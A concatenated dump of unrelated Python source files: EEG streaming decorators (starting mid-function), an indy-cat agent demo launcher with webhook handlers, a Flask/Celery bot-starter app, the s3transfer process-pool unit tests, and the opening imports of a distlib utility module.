if data.topic == 'eeg':
data_tmp_eeg_ = np.zeros((data_.shape[0], 0))
elif data.topic == 'aux':
data_tmp_aux_ = np.zeros((data_.shape[0], 0))
else:
kwargs = {
'data': data_,
'kafka_stream': data,
'topic': data.topic,
'frame': frame,
'latency': latency,
'samples': samples,
}
fn(*[cls] + [kwargs[v] for v in arguments])
return wrap
return wrap_wrap
# ----------------------------------------------------------------------
def fake_loop_consumer(*topics, package_size=None) -> Callable:
"""Decorator to iterate methods with new streamming data.
This decorator will call a method with fake data.
"""
# ----------------------------------------------------------------------
def wrap_wrap(fn: Callable) -> Callable:
arguments = fn.__code__.co_varnames[1 : fn.__code__.co_argcount]
def wrap(cls):
frame = 0
while True:
frame += 1
t0 = time.time()
num_data = int(prop.STREAMING_PACKAGE_SIZE)
num_data = random.randint(num_data - 10, num_data + 10)
eeg = 150 * np.random.normal(
0, 0.2, size=(len(prop.CHANNELS), num_data)
)
if prop.BOARDMODE == 'default':
aux = np.random.normal(0, 0.2, size=(3, num_data))
elif prop.BOARDMODE == 'analog':
if prop.CONNECTION == 'wifi':
aux = np.random.normal(0, 0.07, size=(3, num_data))
if (frame // 10) % 2:
aux += 100
else:
aux = np.random.normal(0, 0.07, size=(3, num_data))
if (time.time() // 1) % 2:
aux += 1
elif prop.BOARDMODE == 'digital':
if prop.CONNECTION == 'wifi':
aux = np.random.normal(0, 0.2, size=(3, num_data))
else:
aux = np.random.normal(0, 0.2, size=(5, num_data))
else:
aux = None
data.timestamp = datetime.now().timestamp() * 1000
data.value['timestamp'] = datetime.now()
# data.value['data'] = eeg, aux
if 'eeg' in topics:
if hasattr(cls, 'buffer_eeg'):
cls.update_buffer(
eeg=eeg,
timestamp=data.value['timestamp'].timestamp(),
)
kwargs = {
'data': eeg,
'kafka_stream': data,
'topic': 'eeg',
'frame': frame,
'latency': 0,
}
fn(*[cls] + [kwargs[v] for v in arguments])
if 'aux' in topics:
if hasattr(cls, 'buffer_aux'):
cls.update_buffer(
aux=aux,
timestamp=data.value['timestamp'].timestamp(),
)
kwargs = {
'data': aux,
'kafka_stream': data,
'topic': 'eeg',
'frame': frame,
'latency': 0,
}
fn(*[cls] + [kwargs[v] for v in arguments])
if 'marker' in topics:
if np.random.random() > 0.9:
data.value['timestamp'] = datetime.now()
# data.value['datetime'] = datetime.now()
data.value['context'][
'timestamp.binary'
] = datetime.now()
# data.value['data'] = chr(
# np.random.choice(range(ord('A'), ord('Z') + 1)))
# data.value['data'] = random.choice(
# ['Right', 'Left', 'Up', 'Bottom'])
data.value['marker'] = random.choice(['MARKER'])
kwargs = {
'data': data.value,
'kafka_stream': data,
'topic': 'marker',
'frame': frame,
'latency': 0,
}
fn(*[cls] + [kwargs[v] for v in arguments])
while time.time() < (
t0 + 1 / (prop.SAMPLE_RATE / prop.STREAMING_PACKAGE_SIZE)
):
time.sleep(0.0001)
return wrap
return wrap_wrap
# ----------------------------------------------------------------------
def marker_slicing(markers, t0, t1):
""""""
if isinstance(markers, str):
markers = [markers]
def wrap_wrap(fn):
arguments = fn.__code__.co_varnames[1 : fn.__code__.co_argcount]
def wrap(cls):
cls._target_marker = []
@loop_consumer('aux', 'marker')
def marker_slicing_(cls, topic, data, kafka_stream, latency):
if topic == 'marker':
# if data['marker'] in markers:
# cls._target_marker.append(
# [data['marker'], kafka_stream.value['datetime']])
if any(
[
bool(re.match(mkr, data['marker']))
for mkr in markers
]
):
cls._target_marker.append(
[data['marker'], kafka_stream.value['datetime']]
)
if len(cls._target_marker) < 3:
return
if target := getattr(cls, '_target_marker', False):
# marker, target = target
last_buffer_timestamp = (
cls.buffer_aux_timestamp[-1] - prop.OFFSET
)
last_target_timestamp = (
datetime.fromtimestamp(target[0][1])
+ timedelta(seconds=t1)
).timestamp()
if last_buffer_timestamp > last_target_timestamp:
# if True:
_marker, _target = target.pop(0)
argmin = np.abs(
cls.buffer_aux_timestamp - _target
).argmin()
start = int((prop.SAMPLE_RATE) * t0)
stop = int((prop.SAMPLE_RATE) * t1)
t = cls.buffer_aux_timestamp[
argmin + start : argmin + stop
]
eeg = cls.buffer_eeg_[
:, argmin + start : argmin + stop
]
aux = cls.buffer_aux_[
:, argmin + start : argmin + stop
]
kwargs = {
'eeg': eeg,
'aux': aux,
'timestamp': t,
'marker_datetime': _target,
'marker': _marker,
'latency': latency,
# 'samples': samples,
}
fn(*[cls] + [kwargs[v] for v in arguments])
else:
logging.warning('Date too old to synchronize')
logging.warning(f'Offset: {prop.OFFSET}')
logging.warning(
f'{datetime.fromtimestamp(last_buffer_timestamp), datetime.fromtimestamp(last_target_timestamp)}'
)
marker_slicing_(cls)
return wrap
return wrap_wrap
|
demo_utils.py
|
import subprocess
import time
import threading
import os
import json
import web
import logging
####################################################
# run background services to receive web hooks
####################################################
# agent webhook callbacks
class webhooks:
def GET(self, topic):
# just for testing; all indy-cat agent hooks are POST requests
s_print("GET: topic=", topic)
return ""
def POST(self, topic):
message = json.loads(web.data())
# dispatch based on the topic type
if topic == "connections":
return self.handle_connections(message["state"], message)
elif topic == "credentials":
return self.handle_credentials(message["state"], message)
elif topic == "presentations":
return self.handle_presentations(message["state"], message)
elif topic == "get-active-menu":
return self.handle_get_active_menu(message)
elif topic == "perform-menu-action":
return self.handle_perform_menu_action(message)
else:
s_print("Callback: topic=", topic, ", message=", message)
return ""
return self.handle_connections(message["state"], message)
def handle_connections(self, state, message):
conn_id = message["connection_id"]
s_print("Connection: state=", state, ", connection_id=", conn_id)
return ""
def handle_credentials(self, state, message):
credential_exchange_id = message["credential_exchange_id"]
s_print(
"Credential: state=",
state,
", credential_exchange_id=",
credential_exchange_id,
)
return ""
def handle_presentations(self, state, message):
presentation_exchange_id = message["presentation_exchange_id"]
s_print(
"Presentation: state=",
state,
", presentation_exchange_id=",
presentation_exchange_id,
)
return ""
def handle_get_active_menu(self, message):
s_print("Get active menu: message=", message)
return ""
def handle_perform_menu_action(self, message):
s_print("Handle menu action: message=", message)
return ""
def background_hook_service(urls, g_vars):
# run app and respond to agent webhook callbacks (run in background)
# port number has to be the first command line arguement
# pass in urls
app = web.application(urls, g_vars)
app.run()
def background_hook_thread(urls, g_vars):
# run app and respond to agent webhook callbacks (run in background)
webhook_thread = threading.Thread(
target=background_hook_service, args=(urls, g_vars)
)
webhook_thread.daemon = True
webhook_thread.start()
print("Web hooks is running!")
return webhook_thread
####################################################
# postgres wallet stuff
####################################################
####################################################
# run indy-cat agent as a sub-process
####################################################
s_print_lock = threading.Lock()
def s_print(*a, **b):
"""Thread safe print function"""
with s_print_lock:
print(*a, **b)
def output_reader(proc):
for line in iter(proc.stdout.readline, b""):
s_print("got line: {0}".format(line.decode("utf-8")), end="")
pass
def stderr_reader(proc):
for line in iter(proc.stderr.readline, b""):
s_print("got line: {0}".format(line.decode("utf-8")), end="")
pass
def write_agent_startup_script(agent_name, agent_args):
cmd = ""
for arg in agent_args:
if '{' in arg:
cmd = cmd + "'" + arg + "' "
else:
cmd = cmd + arg + " "
file2 = open(agent_name,"w+")
file2.write(cmd)
file2.close()
def start_agent_subprocess(agent_name, genesis, seed, endpoint_url, in_port_1, in_port_2, in_port_3, admin_port,
wallet_type, wallet_name, wallet_key, python_path, webhook_url,
scripts_dir, run_subprocess=True):
my_env = os.environ.copy()
my_env["PYTHONPATH"] = python_path
# start and expose a REST callback service
my_env["WEBHOOK_URL"] = webhook_url
print("Webhook url is at", my_env["WEBHOOK_URL"])
# start agent sub-process
agent_args = ['python3', scripts_dir + 'icatagent',
'--inbound-transport', 'http', '0.0.0.0', str(in_port_1),
'--inbound-transport', 'http', '0.0.0.0', str(in_port_2),
'--inbound-transport', 'ws', '0.0.0.0', str(in_port_3),
'--endpoint', endpoint_url,
'--outbound-transport', 'ws',
'--outbound-transport', 'http',
'--genesis-transactions', genesis,
'--auto-respond-messages',
'--accept-invites',
'--accept-requests',
'--auto-ping-connection',
'--wallet-type', wallet_type,
'--wallet-name', wallet_name,
'--wallet-key', wallet_key,
'--seed', seed,
'--admin', '0.0.0.0', str(admin_port),
'--label', agent_name]
use_postgres = False
if use_postgres:
agent_args.extend(['--storage-type', 'postgres_storage',
'--storage-config', '{"url":"localhost:5432","max_connections":5}',
'--storage-creds', '{"account":"postgres","password":"mysecretpassword","admin_account":"postgres","admin_password":"mysecretpassword"}',
])
# what are we doing? write out to a command file
write_agent_startup_script(agent_name + ".sh", agent_args)
if run_subprocess:
# now startup our sub-process
agent_proc = subprocess.Popen(agent_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=my_env)
time.sleep(0.5)
t1 = threading.Thread(target=output_reader, args=(agent_proc,))
t1.start()
t2 = threading.Thread(target=stderr_reader, args=(agent_proc,))
t2.start()
return (agent_proc, t1, t2)
else:
# pause and tell user to manually run script
print("Please run PYTHONPATH=.. ./" + agent_name + ".sh and then hit <enter> to continue")
option = input("Do it!")
return (None, None, None)
|
app.py
|
# from connexion.resolver import RestyResolver
from flask import Flask, render_template
from flask import jsonify
import connexion
from services.bots import Bots
from celery import Celery
import requests
import time
import threading
import os
# Create application instance
# app = connexion.FlaskApp(__name__, specification_dir="swagger/")
# Read the swagger.yml file to configure the endpoints
# app.add_api('api.yaml')
def make_celery(app):
celery = Celery(
app.import_name,
backend=app.config['CELERY_RESULT_BACKEND'],
broker=app.config['CELERY_BROKER_URL']
)
celery.conf.update(app.config)
class ContextTask(celery.Task):
def __call__(self, *args, **kwargs):
with app.app_context():
return self.run(*args, **kwargs)
celery.Task = ContextTask
return celery
app = Flask(__name__, template_folder="templates")
# TODO: add configuration management
app.config.update(
CELERY_BROKER_URL='redis://localhost:6379',
CELERY_RESULT_BACKEND='redis://localhost:6379'
)
# app.config.from_object('yourapplication.default_settings')
# app.config.from_envvar('YOURAPPLICATION_SETTINGS')
# app.config.from_object('configmodule.DevelopmentConfig')
celery = make_celery(app)
@app.route("/")
def index():
return render_template("index.html")
# return jsonify("Welcome to Helios System")
@celery.task()
@app.before_first_request
@app.route("/v1/start")
def activate_reap():
def reap():
"""
start bot crawling sequence
"""
print ("Initiating Bot Sequence ...")
test_bot = Bots()
test_bot.run_craigbot()
return jsonify(interval="10m", result="SUCCESS")
thread = threading.Thread(target=reap)
thread.start()
def start_runner(running_port):
def start_loop(running_port):
not_started = True
while not_started:
print('In start loop')
try:
print ("checking app running at port {}".format(running_port))
running_url = "http://0.0.0.0:" + str(running_port) + "/"
print ("request sent to {}".format(str(running_url)))
r = requests.get(str(running_url))
print("status code is {}".format(str(r.status_code)))
if r.status_code == 200:
print('Server started, quiting start_loop')
not_started = False
except Exception as e:
print ("Server not yet started, exception: {}".format(str(e)))
time.sleep(2)
print('Started runner')
# need ',' at the end of args to pass as tuple
thread = threading.Thread(target=start_loop, args=(running_port,))
thread.start()
if __name__ == '__main__':
# app = connexion.FlaskApp(__name__, specification_dir="swagger/")
# app.add_api('api.yaml')
# app.add_api('api.yaml', resolver=RestyResolver('api'))
# app.add_api('api.yml')
print('Starting runner')
port = int(os.environ.get('PORT', 5000))
start_runner(port)
app.run(host='0.0.0.0', port=port, debug=True)
|
test_processpool.py
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import os
import queue
import signal
import threading
import time
from io import BytesIO
from botocore.client import BaseClient
from botocore.config import Config
from botocore.exceptions import ClientError, ReadTimeoutError
from s3transfer.constants import PROCESS_USER_AGENT
from s3transfer.exceptions import CancelledError, RetriesExceededError
from s3transfer.processpool import (
SHUTDOWN_SIGNAL,
ClientFactory,
DownloadFileRequest,
GetObjectJob,
GetObjectSubmitter,
GetObjectWorker,
ProcessPoolDownloader,
ProcessPoolTransferFuture,
ProcessPoolTransferMeta,
ProcessTransferConfig,
TransferMonitor,
TransferState,
ignore_ctrl_c,
)
from s3transfer.utils import CallArgs, OSUtils
from tests import (
FileCreator,
StreamWithError,
StubbedClientTest,
mock,
skip_if_windows,
unittest,
)
class RenameFailingOSUtils(OSUtils):
def __init__(self, exception):
self.exception = exception
def rename_file(self, current_filename, new_filename):
raise self.exception
class TestIgnoreCtrlC(unittest.TestCase):
@skip_if_windows('os.kill() with SIGINT not supported on Windows')
def test_ignore_ctrl_c(self):
with ignore_ctrl_c():
try:
os.kill(os.getpid(), signal.SIGINT)
except KeyboardInterrupt:
self.fail(
'The ignore_ctrl_c context manager should have '
'ignored the KeyboardInterrupt exception'
)
class TestProcessPoolDownloader(unittest.TestCase):
def test_uses_client_kwargs(self):
with mock.patch('s3transfer.processpool.ClientFactory') as factory:
ProcessPoolDownloader(client_kwargs={'region_name': 'myregion'})
self.assertEqual(
factory.call_args[0][0], {'region_name': 'myregion'}
)
class TestProcessPoolTransferFuture(unittest.TestCase):
def setUp(self):
self.monitor = TransferMonitor()
self.transfer_id = self.monitor.notify_new_transfer()
self.meta = ProcessPoolTransferMeta(
transfer_id=self.transfer_id, call_args=CallArgs()
)
self.future = ProcessPoolTransferFuture(
monitor=self.monitor, meta=self.meta
)
def test_meta(self):
self.assertEqual(self.future.meta, self.meta)
def test_done(self):
self.assertFalse(self.future.done())
self.monitor.notify_done(self.transfer_id)
self.assertTrue(self.future.done())
def test_result(self):
self.monitor.notify_done(self.transfer_id)
self.assertIsNone(self.future.result())
def test_result_with_exception(self):
self.monitor.notify_exception(self.transfer_id, RuntimeError())
self.monitor.notify_done(self.transfer_id)
with self.assertRaises(RuntimeError):
self.future.result()
def test_result_with_keyboard_interrupt(self):
mock_monitor = mock.Mock(TransferMonitor)
mock_monitor._connect = mock.Mock()
mock_monitor.poll_for_result.side_effect = KeyboardInterrupt()
future = ProcessPoolTransferFuture(
monitor=mock_monitor, meta=self.meta
)
with self.assertRaises(KeyboardInterrupt):
future.result()
self.assertTrue(mock_monitor._connect.called)
self.assertTrue(mock_monitor.notify_exception.called)
call_args = mock_monitor.notify_exception.call_args[0]
self.assertEqual(call_args[0], self.transfer_id)
self.assertIsInstance(call_args[1], CancelledError)
def test_cancel(self):
self.future.cancel()
self.monitor.notify_done(self.transfer_id)
with self.assertRaises(CancelledError):
self.future.result()
class TestProcessPoolTransferMeta(unittest.TestCase):
def test_transfer_id(self):
meta = ProcessPoolTransferMeta(1, CallArgs())
self.assertEqual(meta.transfer_id, 1)
def test_call_args(self):
call_args = CallArgs()
meta = ProcessPoolTransferMeta(1, call_args)
self.assertEqual(meta.call_args, call_args)
def test_user_context(self):
meta = ProcessPoolTransferMeta(1, CallArgs())
self.assertEqual(meta.user_context, {})
meta.user_context['mykey'] = 'myvalue'
self.assertEqual(meta.user_context, {'mykey': 'myvalue'})
class TestClientFactory(unittest.TestCase):
def test_create_client(self):
client = ClientFactory().create_client()
self.assertIsInstance(client, BaseClient)
self.assertEqual(client.meta.service_model.service_name, 's3')
self.assertIn(PROCESS_USER_AGENT, client.meta.config.user_agent)
def test_create_client_with_client_kwargs(self):
client = ClientFactory({'region_name': 'myregion'}).create_client()
self.assertEqual(client.meta.region_name, 'myregion')
def test_user_agent_with_config(self):
client = ClientFactory({'config': Config()}).create_client()
self.assertIn(PROCESS_USER_AGENT, client.meta.config.user_agent)
def test_user_agent_with_existing_user_agent_extra(self):
config = Config(user_agent_extra='foo/1.0')
client = ClientFactory({'config': config}).create_client()
self.assertIn(PROCESS_USER_AGENT, client.meta.config.user_agent)
def test_user_agent_with_existing_user_agent(self):
config = Config(user_agent='foo/1.0')
client = ClientFactory({'config': config}).create_client()
self.assertIn(PROCESS_USER_AGENT, client.meta.config.user_agent)
class TestTransferMonitor(unittest.TestCase):
def setUp(self):
self.monitor = TransferMonitor()
self.transfer_id = self.monitor.notify_new_transfer()
def test_notify_new_transfer_creates_new_state(self):
monitor = TransferMonitor()
transfer_id = monitor.notify_new_transfer()
self.assertFalse(monitor.is_done(transfer_id))
self.assertIsNone(monitor.get_exception(transfer_id))
def test_notify_new_transfer_increments_transfer_id(self):
monitor = TransferMonitor()
self.assertEqual(monitor.notify_new_transfer(), 0)
self.assertEqual(monitor.notify_new_transfer(), 1)
def test_notify_get_exception(self):
exception = Exception()
self.monitor.notify_exception(self.transfer_id, exception)
self.assertEqual(
self.monitor.get_exception(self.transfer_id), exception
)
def test_get_no_exception(self):
self.assertIsNone(self.monitor.get_exception(self.transfer_id))
def test_notify_jobs(self):
self.monitor.notify_expected_jobs_to_complete(self.transfer_id, 2)
self.assertEqual(self.monitor.notify_job_complete(self.transfer_id), 1)
self.assertEqual(self.monitor.notify_job_complete(self.transfer_id), 0)
def test_notify_jobs_for_multiple_transfers(self):
self.monitor.notify_expected_jobs_to_complete(self.transfer_id, 2)
other_transfer_id = self.monitor.notify_new_transfer()
self.monitor.notify_expected_jobs_to_complete(other_transfer_id, 2)
self.assertEqual(self.monitor.notify_job_complete(self.transfer_id), 1)
self.assertEqual(
self.monitor.notify_job_complete(other_transfer_id), 1
)
def test_done(self):
self.assertFalse(self.monitor.is_done(self.transfer_id))
self.monitor.notify_done(self.transfer_id)
self.assertTrue(self.monitor.is_done(self.transfer_id))
def test_poll_for_result(self):
self.monitor.notify_done(self.transfer_id)
self.assertIsNone(self.monitor.poll_for_result(self.transfer_id))
def test_poll_for_result_raises_error(self):
self.monitor.notify_exception(self.transfer_id, RuntimeError())
self.monitor.notify_done(self.transfer_id)
with self.assertRaises(RuntimeError):
self.monitor.poll_for_result(self.transfer_id)
def test_poll_for_result_waits_till_done(self):
event_order = []
def sleep_then_notify_done():
time.sleep(0.05)
event_order.append('notify_done')
self.monitor.notify_done(self.transfer_id)
t = threading.Thread(target=sleep_then_notify_done)
t.start()
self.monitor.poll_for_result(self.transfer_id)
event_order.append('done_polling')
self.assertEqual(event_order, ['notify_done', 'done_polling'])
def test_notify_cancel_all_in_progress(self):
monitor = TransferMonitor()
transfer_ids = []
for _ in range(10):
transfer_ids.append(monitor.notify_new_transfer())
monitor.notify_cancel_all_in_progress()
for transfer_id in transfer_ids:
self.assertIsInstance(
monitor.get_exception(transfer_id), CancelledError
)
# Cancelling a transfer does not mean it is done as there may
# be cleanup work left to do.
self.assertFalse(monitor.is_done(transfer_id))
def test_notify_cancel_does_not_affect_done_transfers(self):
self.monitor.notify_done(self.transfer_id)
self.monitor.notify_cancel_all_in_progress()
self.assertTrue(self.monitor.is_done(self.transfer_id))
self.assertIsNone(self.monitor.get_exception(self.transfer_id))
class TestTransferState(unittest.TestCase):
def setUp(self):
self.state = TransferState()
def test_done(self):
self.assertFalse(self.state.done)
self.state.set_done()
self.assertTrue(self.state.done)
def test_waits_till_done_is_set(self):
event_order = []
def sleep_then_set_done():
time.sleep(0.05)
event_order.append('set_done')
self.state.set_done()
t = threading.Thread(target=sleep_then_set_done)
t.start()
self.state.wait_till_done()
event_order.append('done_waiting')
self.assertEqual(event_order, ['set_done', 'done_waiting'])
def test_exception(self):
exception = RuntimeError()
self.state.exception = exception
self.assertEqual(self.state.exception, exception)
def test_jobs_to_complete(self):
self.state.jobs_to_complete = 5
self.assertEqual(self.state.jobs_to_complete, 5)
def test_decrement_jobs_to_complete(self):
self.state.jobs_to_complete = 5
self.assertEqual(self.state.decrement_jobs_to_complete(), 4)
class TestGetObjectSubmitter(StubbedClientTest):
def setUp(self):
super().setUp()
self.transfer_config = ProcessTransferConfig()
self.client_factory = mock.Mock(ClientFactory)
self.client_factory.create_client.return_value = self.client
self.transfer_monitor = TransferMonitor()
self.osutil = mock.Mock(OSUtils)
self.download_request_queue = queue.Queue()
self.worker_queue = queue.Queue()
self.submitter = GetObjectSubmitter(
transfer_config=self.transfer_config,
client_factory=self.client_factory,
transfer_monitor=self.transfer_monitor,
osutil=self.osutil,
download_request_queue=self.download_request_queue,
worker_queue=self.worker_queue,
)
self.transfer_id = self.transfer_monitor.notify_new_transfer()
self.bucket = 'bucket'
self.key = 'key'
self.filename = 'myfile'
self.temp_filename = 'myfile.temp'
self.osutil.get_temp_filename.return_value = self.temp_filename
self.extra_args = {}
self.expected_size = None
def add_download_file_request(self, **override_kwargs):
kwargs = {
'transfer_id': self.transfer_id,
'bucket': self.bucket,
'key': self.key,
'filename': self.filename,
'extra_args': self.extra_args,
'expected_size': self.expected_size,
}
kwargs.update(override_kwargs)
self.download_request_queue.put(DownloadFileRequest(**kwargs))
def add_shutdown(self):
self.download_request_queue.put(SHUTDOWN_SIGNAL)
def assert_submitted_get_object_jobs(self, expected_jobs):
actual_jobs = []
while not self.worker_queue.empty():
actual_jobs.append(self.worker_queue.get())
self.assertEqual(actual_jobs, expected_jobs)
def test_run_for_non_ranged_download(self):
self.add_download_file_request(expected_size=1)
self.add_shutdown()
self.submitter.run()
self.osutil.allocate.assert_called_with(self.temp_filename, 1)
self.assert_submitted_get_object_jobs(
[
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=0,
extra_args={},
filename=self.filename,
)
]
)
def test_run_for_ranged_download(self):
self.transfer_config.multipart_chunksize = 2
self.transfer_config.multipart_threshold = 4
self.add_download_file_request(expected_size=4)
self.add_shutdown()
self.submitter.run()
self.osutil.allocate.assert_called_with(self.temp_filename, 4)
self.assert_submitted_get_object_jobs(
[
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=0,
extra_args={'Range': 'bytes=0-1'},
filename=self.filename,
),
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=2,
extra_args={'Range': 'bytes=2-'},
filename=self.filename,
),
]
)
def test_run_when_expected_size_not_provided(self):
self.stubber.add_response(
'head_object',
{'ContentLength': 1},
expected_params={'Bucket': self.bucket, 'Key': self.key},
)
self.add_download_file_request(expected_size=None)
self.add_shutdown()
self.submitter.run()
self.stubber.assert_no_pending_responses()
self.osutil.allocate.assert_called_with(self.temp_filename, 1)
self.assert_submitted_get_object_jobs(
[
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=0,
extra_args={},
filename=self.filename,
)
]
)
def test_run_with_extra_args(self):
self.stubber.add_response(
'head_object',
{'ContentLength': 1},
expected_params={
'Bucket': self.bucket,
'Key': self.key,
'VersionId': 'versionid',
},
)
self.add_download_file_request(
extra_args={'VersionId': 'versionid'}, expected_size=None
)
self.add_shutdown()
self.submitter.run()
self.stubber.assert_no_pending_responses()
self.osutil.allocate.assert_called_with(self.temp_filename, 1)
self.assert_submitted_get_object_jobs(
[
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=0,
extra_args={'VersionId': 'versionid'},
filename=self.filename,
)
]
)
def test_run_with_exception(self):
self.stubber.add_client_error('head_object', 'NoSuchKey', 404)
self.add_download_file_request(expected_size=None)
self.add_shutdown()
self.submitter.run()
self.stubber.assert_no_pending_responses()
self.assert_submitted_get_object_jobs([])
self.assertIsInstance(
self.transfer_monitor.get_exception(self.transfer_id), ClientError
)
def test_run_with_error_in_allocating_temp_file(self):
self.osutil.allocate.side_effect = OSError()
self.add_download_file_request(expected_size=1)
self.add_shutdown()
self.submitter.run()
self.assert_submitted_get_object_jobs([])
self.assertIsInstance(
self.transfer_monitor.get_exception(self.transfer_id), OSError
)
@skip_if_windows('os.kill() with SIGINT not supported on Windows')
def test_submitter_cannot_be_killed(self):
self.add_download_file_request(expected_size=None)
self.add_shutdown()
def raise_ctrl_c(**kwargs):
os.kill(os.getpid(), signal.SIGINT)
mock_client = mock.Mock()
mock_client.head_object = raise_ctrl_c
self.client_factory.create_client.return_value = mock_client
try:
self.submitter.run()
except KeyboardInterrupt:
self.fail(
'The submitter should have not been killed by the '
'KeyboardInterrupt'
)
class TestGetObjectWorker(StubbedClientTest):
def setUp(self):
super().setUp()
self.files = FileCreator()
self.queue = queue.Queue()
self.client_factory = mock.Mock(ClientFactory)
self.client_factory.create_client.return_value = self.client
self.transfer_monitor = TransferMonitor()
self.osutil = OSUtils()
self.worker = GetObjectWorker(
queue=self.queue,
client_factory=self.client_factory,
transfer_monitor=self.transfer_monitor,
osutil=self.osutil,
)
self.transfer_id = self.transfer_monitor.notify_new_transfer()
self.bucket = 'bucket'
self.key = 'key'
self.remote_contents = b'my content'
self.temp_filename = self.files.create_file('tempfile', '')
self.extra_args = {}
self.offset = 0
self.final_filename = self.files.full_path('final_filename')
self.stream = BytesIO(self.remote_contents)
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1000
)
def tearDown(self):
super().tearDown()
self.files.remove_all()
def add_get_object_job(self, **override_kwargs):
kwargs = {
'transfer_id': self.transfer_id,
'bucket': self.bucket,
'key': self.key,
'temp_filename': self.temp_filename,
'extra_args': self.extra_args,
'offset': self.offset,
'filename': self.final_filename,
}
kwargs.update(override_kwargs)
self.queue.put(GetObjectJob(**kwargs))
def add_shutdown(self):
self.queue.put(SHUTDOWN_SIGNAL)
def add_stubbed_get_object_response(self, body=None, expected_params=None):
if body is None:
body = self.stream
get_object_response = {'Body': body}
if expected_params is None:
expected_params = {'Bucket': self.bucket, 'Key': self.key}
self.stubber.add_response(
'get_object', get_object_response, expected_params
)
def assert_contents(self, filename, contents):
self.assertTrue(os.path.exists(filename))
with open(filename, 'rb') as f:
self.assertEqual(f.read(), contents)
def assert_does_not_exist(self, filename):
self.assertFalse(os.path.exists(filename))
def test_run_is_final_job(self):
self.add_get_object_job()
self.add_shutdown()
self.add_stubbed_get_object_response()
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1
)
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assert_does_not_exist(self.temp_filename)
self.assert_contents(self.final_filename, self.remote_contents)
def test_run_jobs_is_not_final_job(self):
self.add_get_object_job()
self.add_shutdown()
self.add_stubbed_get_object_response()
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1000
)
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assert_contents(self.temp_filename, self.remote_contents)
self.assert_does_not_exist(self.final_filename)
def test_run_with_extra_args(self):
self.add_get_object_job(extra_args={'VersionId': 'versionid'})
self.add_shutdown()
self.add_stubbed_get_object_response(
expected_params={
'Bucket': self.bucket,
'Key': self.key,
'VersionId': 'versionid',
}
)
self.worker.run()
self.stubber.assert_no_pending_responses()
def test_run_with_offset(self):
offset = 1
self.add_get_object_job(offset=offset)
self.add_shutdown()
self.add_stubbed_get_object_response()
self.worker.run()
with open(self.temp_filename, 'rb') as f:
f.seek(offset)
self.assertEqual(f.read(), self.remote_contents)
def test_run_error_in_get_object(self):
self.add_get_object_job()
self.add_shutdown()
self.stubber.add_client_error('get_object', 'NoSuchKey', 404)
self.add_stubbed_get_object_response()
self.worker.run()
self.assertIsInstance(
self.transfer_monitor.get_exception(self.transfer_id), ClientError
)
def test_run_does_retries_for_get_object(self):
self.add_get_object_job()
self.add_shutdown()
self.add_stubbed_get_object_response(
body=StreamWithError(
self.stream, ReadTimeoutError(endpoint_url='')
)
)
self.add_stubbed_get_object_response()
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assert_contents(self.temp_filename, self.remote_contents)
def test_run_can_exhaust_retries_for_get_object(self):
self.add_get_object_job()
self.add_shutdown()
# 5 is the current setting for max number of GetObject attempts
for _ in range(5):
self.add_stubbed_get_object_response(
body=StreamWithError(
self.stream, ReadTimeoutError(endpoint_url='')
)
)
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assertIsInstance(
self.transfer_monitor.get_exception(self.transfer_id),
RetriesExceededError,
)
def test_run_skips_get_object_on_previous_exception(self):
self.add_get_object_job()
self.add_shutdown()
self.transfer_monitor.notify_exception(self.transfer_id, Exception())
self.worker.run()
# Note we did not add a stubbed response for get_object
self.stubber.assert_no_pending_responses()
def test_run_final_job_removes_file_on_previous_exception(self):
self.add_get_object_job()
self.add_shutdown()
self.transfer_monitor.notify_exception(self.transfer_id, Exception())
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1
)
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assert_does_not_exist(self.temp_filename)
self.assert_does_not_exist(self.final_filename)
def test_run_fails_to_rename_file(self):
exception = OSError()
osutil = RenameFailingOSUtils(exception)
self.worker = GetObjectWorker(
queue=self.queue,
client_factory=self.client_factory,
transfer_monitor=self.transfer_monitor,
osutil=osutil,
)
self.add_get_object_job()
self.add_shutdown()
self.add_stubbed_get_object_response()
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1
)
self.worker.run()
self.assertEqual(
self.transfer_monitor.get_exception(self.transfer_id), exception
)
self.assert_does_not_exist(self.temp_filename)
self.assert_does_not_exist(self.final_filename)
@skip_if_windows('os.kill() with SIGINT not supported on Windows')
def test_worker_cannot_be_killed(self):
self.add_get_object_job()
self.add_shutdown()
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1
)
def raise_ctrl_c(**kwargs):
os.kill(os.getpid(), signal.SIGINT)
mock_client = mock.Mock()
mock_client.get_object = raise_ctrl_c
self.client_factory.create_client.return_value = mock_client
try:
self.worker.run()
except KeyboardInterrupt:
self.fail(
'The worker should have not been killed by the '
'KeyboardInterrupt'
)
|
util.py
|
#
# Copyright (C) 2012-2013 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import codecs
from collections import deque
import contextlib
import csv
from glob import iglob as std_iglob
import io
import json
import logging
import os
import py_compile
import re
import shutil
import socket
import ssl
import subprocess
import sys
import tarfile
